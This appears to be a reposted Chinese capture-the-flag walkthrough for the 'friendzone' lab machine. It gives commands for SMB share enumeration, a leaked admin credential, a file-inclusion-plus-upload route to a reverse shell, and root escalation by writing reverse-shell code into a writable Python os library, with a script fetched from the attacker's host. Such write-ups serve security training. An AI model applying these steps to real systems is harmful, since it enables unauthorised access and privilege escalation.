#这个工具的下载命令我直接放这里了!
sudo apt install chromium-l10n
wget https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip
unzip aquatone_linux_amd64_1.7.0.zip
sudo rm -rif aquatone_linux_amd64_1.7.0.zip LICENSE.txt README-cloudshell.txt
sudo mv aquatone /usr/local/bin
cat url |aquatone
下图是该工具出的报告。
我从报告中找到这么一个页面,尝试爆破后没结果,暂时放这。
0x03 SMB文件上传
因为前面nmap扫描结果显示该机器开放了smb服务,我们接下来对smb服务进行一波测试。
crackmapexec smb 10.10.10.123 -u "" -p "" --shares
发现Development 目录具有读权限和写权限,general目录有读权限。
smbclient //10.10.10.123/genera
通过找到的密码尝试登录。
admin:WORKWORKHhallelujah@#
成功进入后台。
0x04文件包含
根据页面提示加上如下参数后访问,发现出来一个时间戳。
怀疑此处存在文件包含于是进行测试。
通过上图我们可以看到,此处的确是存在一个本地文件包含漏洞,现在我们尝试读取dashboard文件,我们来看看它代码是怎么写的。
我们可以看到它直接通过get传参给include,然后后面接了.php。
结合之前发现的smb服务Development目录下的写权限,此时getshell的思路就很清晰了,先通过smb服务上传到Development目录下一个含有反弹shell代码的php文件,然后利用此处的文件包含漏洞即可getshell。
0x05权限提升
python3 -m http.server 80
wget 10.10.16.3/linpeas.sh
我们在linpeas.sh的报告中看到如下文件,发现我们竟然对python的OS库有写权限。
那我们接下来就传pspy64到该机器上来,然后看看有没有以root用户定期执行的py脚本调用了os库,如果有的话,我们在OS库中写入反弹shell的代码,这样当该脚本被执行时,我们就会获得一个root权限的shell。
然后如上图所示,我们看到这个脚本是以root权限运行的,并且该脚本调用了OS库,所以接下来我们只需要在OS库中写入反弹shell的代码即可,如下图所示。
上图框中的代码就是我们加到os.py文件末尾反弹shell的代码,通过下图我们可以看到root权限的shell已经弹回来了。
friendzone靶机算是一个中等难度的靶机,知识点涉及到了DNS区域传输、SMB文件上传、文件包含、以及非常规的linux提权等知识。
总的来说,还是学到不少知识,包括DNS区域传输,SMB文件上传配合文件包含漏洞getshell,利用写入OS库恶意代码配合定时任务成功提权至root权限。
来源:【九爱网址导航www.fuzhukm.com】 免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!